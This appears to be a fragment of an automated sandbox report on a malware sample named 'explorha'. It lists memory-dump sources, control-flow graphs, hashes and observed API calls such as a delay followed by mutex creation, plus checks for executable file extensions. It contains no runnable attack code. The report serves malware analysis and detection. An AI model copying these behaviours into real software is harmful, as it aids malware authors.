                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 42c4921fa42a92c1ec1dde9402f32f14f39d12423e1a34f58885764d0ce026fd
                                                                                                                                                                                                                                        • Instruction ID: 474bc2c9bb25c279a62c2e29147eae22a14b6b0203e428ee4e05b6689c9ba294
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42c4921fa42a92c1ec1dde9402f32f14f39d12423e1a34f58885764d0ce026fd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A731F471700244DBFB08DB7CDC8979DBBA2EB86314F208718E515D72D2E7BD99808762
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 124 709ee8-709f08 128 709f36-709f52 124->128 129 709f0a-709f16 124->129 132 709f80-709f9f 128->132 133 709f54-709f60 128->133 130 709f18-709f26 129->130 131 709f2c-709f33 call 71ecf8 129->131 130->131 134 70a40f 130->134 131->128 138 709fa1-709fad 132->138 139 709fcd-70a3e6 call 719750 132->139 136 709f62-709f70 133->136 137 709f76-709f7d call 71ecf8 133->137 141 70a414-70a466 call 7382fa * 3 Sleep CreateMutexA 134->141 142 70a40f call 7382fa 134->142 136->134 136->137 137->132 145 709fc3-709fca call 71ecf8 138->145 146 709faf-709fbd 138->146 142->141 145->139 146->134 146->145
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 4b827fd263a9c1048e128741875ba517495c743c4e410901fb58f3c044464706
                                                                                                                                                                                                                                        • Instruction ID: 1602f47a888efee1bbcb85b197ec5f01f780973cd69532e83fcb6e33b7f71399
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b827fd263a9c1048e128741875ba517495c743c4e410901fb58f3c044464706
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3314671600244DBEB08DB7CCD8979DB6A2AB86314F208718F511D72D7EBBD59808762
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 161 70a01d-70a03d 165 70a06b-70a087 161->165 166 70a03f-70a04b 161->166 167 70a0b5-70a0d4 165->167 168 70a089-70a095 165->168 169 70a061-70a068 call 71ecf8 166->169 170 70a04d-70a05b 166->170 174 70a102-70a3e6 call 719750 167->174 175 70a0d6-70a0e2 167->175 172 70a097-70a0a5 168->172 173 70a0ab-70a0b2 call 71ecf8 168->173 169->165 170->169 176 70a414-70a466 call 7382fa * 3 Sleep CreateMutexA 170->176 172->173 172->176 173->167 180 70a0e4-70a0f2 175->180 181 70a0f8-70a0ff call 71ecf8 175->181 180->176 180->181 181->174
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: eb352f738865f505f5b15370f9ca4aa653b24b5364bd0f0589c7c0912b1f5da2
                                                                                                                                                                                                                                        • Instruction ID: d47dbbc1131c2b6ac8416fdb32adb72026bcd46cf78744310484d02543f3e230
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb352f738865f505f5b15370f9ca4aa653b24b5364bd0f0589c7c0912b1f5da2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7031E671600348EBEB08DB6CCD8979DB6A2AB86314F208718E415D73D7EBBD59808762
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 196 70a152-70a172 200 70a1a0-70a1bc 196->200 201 70a174-70a180 196->201 202 70a1ea-70a209 200->202 203 70a1be-70a1ca 200->203 204 70a182-70a190 201->204 205 70a196-70a19d call 71ecf8 201->205 208 70a237-70a3e6 call 719750 202->208 209 70a20b-70a217 202->209 206 70a1e0-70a1e7 call 71ecf8 203->206 207 70a1cc-70a1da 203->207 204->205 210 70a419-70a466 call 7382fa * 2 Sleep CreateMutexA 204->210 205->200 206->202 207->206 207->210 214 70a219-70a227 209->214 215 70a22d-70a234 call 71ecf8 209->215 214->210 214->215 215->208
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 14e13933b342fcbfd142f665bb237e88de3d689147a0592a029cf4a1e29306f3
                                                                                                                                                                                                                                        • Instruction ID: 1b17d3ad8651c89c5be3a85d7ab20b11ce7575fccfaa608f057d78709785c97a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 14e13933b342fcbfd142f665bb237e88de3d689147a0592a029cf4a1e29306f3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D310471600348EBEB08DB6CCC997ADB7B2EB86314F208718E815D72D2D7BD59808762
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 229 70958c-7095aa 230 7095d8-7095f7 229->230 231 7095ac-7095b8 229->231 234 709625-70a3e6 call 719750 230->234 235 7095f9-709605 230->235 232 7095ba-7095c8 231->232 233 7095ce-7095d5 call 71ecf8 231->233 232->233 237 70a3e7 232->237 233->230 239 709607-709615 235->239 240 70961b-709622 call 71ecf8 235->240 242 70a423-70a466 Sleep CreateMutexA 237->242 243 70a3e7 call 7382fa 237->243 239->237 239->240 240->234 243->242
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 620dfaef22e54693a0489d4ed0ca1b64bb2d7d1e933f636a09e1e27d82f31d56
                                                                                                                                                                                                                                        • Instruction ID: 1a379052d6876eb2b9a8a42474ccfd82aff817ae5393feb8bfc5a74f63eca5ed
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 620dfaef22e54693a0489d4ed0ca1b64bb2d7d1e933f636a09e1e27d82f31d56
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF212971604244DBFB18DF6CCD897ADFBA2EB45304F208718E915973D2D7BD59808752
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 271 70a326-70a33e 272 70a340-70a34c 271->272 273 70a36c-70a36e 271->273 274 70a362-70a369 call 71ecf8 272->274 275 70a34e-70a35c 272->275 276 70a370-70a377 273->276 277 70a379-70a381 call 7078b0 273->277 274->273 275->274 278 70a41e-70a458 call 7382fa Sleep CreateMutexA 275->278 280 70a3bb-70a3e6 call 719750 276->280 288 70a383-70a38b call 7078b0 277->288 289 70a3b4-70a3b6 277->289 292 70a45e-70a466 278->292 288->289 293 70a38d-70a395 call 7078b0 288->293 289->280 293->289 297 70a397-70a39f call 7078b0 293->297 297->289 300 70a3a1-70a3a9 call 7078b0 297->300 300->289 303 70a3ab-70a3b2 300->303 303->280
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 42af1f032d9ba2581048245d7d9b6326d8cd02fba328ef6ae591617b82aaecef
                                                                                                                                                                                                                                        • Instruction ID: 4c35e5183dba0951823c646c83c5d0d932ebdc5d725f855eb007a6cf6d6e6d39
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42af1f032d9ba2581048245d7d9b6326d8cd02fba328ef6ae591617b82aaecef
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E210870644304F7F728AB6C884F76DF6D2EF41300F208715E941C62D2CABD5880C267
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 251 709e1f-709e2b 252 709e41-709e6a call 71ecf8 251->252 253 709e2d-709e3b 251->253 259 709e98-70a3e6 call 719750 252->259 260 709e6c-709e78 252->260 253->252 254 70a40a 253->254 256 70a423-70a466 Sleep CreateMutexA 254->256 257 70a40a call 7382fa 254->257 257->256 263 709e7a-709e88 260->263 264 709e8e-709e95 call 71ecf8 260->264 263->254 263->264 264->259
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: cfc74b21adfcdd153e0174b5e1dbff963f8ed3fa81fc10b7d39292b9416ce819
                                                                                                                                                                                                                                        • Instruction ID: 975728bbbd3e5a71c2e0219006196cc8ad82a69368422ca0af57e75d47495ff1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfc74b21adfcdd153e0174b5e1dbff963f8ed3fa81fc10b7d39292b9416ce819
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46210872604344EBFB08DB6CDC897ADB7A2EB86311F204728E915D62D2D7BD59808752
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: Xt$Xt
                                                                                                                                                                                                                                        • API String ID: 0-475810656
                                                                                                                                                                                                                                        • Opcode ID: ac59082c9d6dce2fb0acae6c1eb29a2d77903316a9a26bfd3db1b491670abf65
                                                                                                                                                                                                                                        • Instruction ID: 46d1666ecafddbc1b3e160ed27bdb8499bb4b4570d2edfd9c1c932b231513696
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac59082c9d6dce2fb0acae6c1eb29a2d77903316a9a26bfd3db1b491670abf65
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51F14C71E012199BDF14CFA8D8807AEBBF1FF89314F258269D819AB345D735AE01DB90
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _wcsrchr
                                                                                                                                                                                                                                        • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                                                        • API String ID: 1752292252-4019086052
                                                                                                                                                                                                                                        • Opcode ID: 3ec43a65457977cdefc604948bd7cebe09cad8535d32d91fa77c74aae0f139a7
                                                                                                                                                                                                                                        • Instruction ID: 50bdad8e34c835bb0765ae71663e6f2ed5228df12f95239f4e8e8a10f91fa281
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ec43a65457977cdefc604948bd7cebe09cad8535d32d91fa77c74aae0f139a7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87012677A243252636552069BC066B717A99BC1BB4F2A003EFC44F72C3FFACDC425196
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 32384418-0
                                                                                                                                                                                                                                        • Opcode ID: a3653bc443d9a3f32a5d3f38b2147e2e8bfad6520b37c434b966908c7d422277
                                                                                                                                                                                                                                        • Instruction ID: 7d773e6781a40ed6cfc29baadf67f964ef928868e095c97b246453030e31e832
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3653bc443d9a3f32a5d3f38b2147e2e8bfad6520b37c434b966908c7d422277
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EFA1E2B1A01216EFDB21DB68C94879AB7F8FF15354F004229E815D72C2EB38EA45CBD1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Mtx_unlock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1418687624-0
                                                                                                                                                                                                                                        • Opcode ID: 6f864dcfbfb6004315650b756e26dea06dc27d81debf057e38e0a260bc52dac6
                                                                                                                                                                                                                                        • Instruction ID: eb69cd63b0ec9272230362474170fe2815710ab87ba7a3e82ac8c8fdbdfabbc0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f864dcfbfb6004315650b756e26dea06dc27d81debf057e38e0a260bc52dac6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C881C3B1A00315DBDB309F68CC49FAAB7E4EF08314F118369E919A72D1DB79AD44CB91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
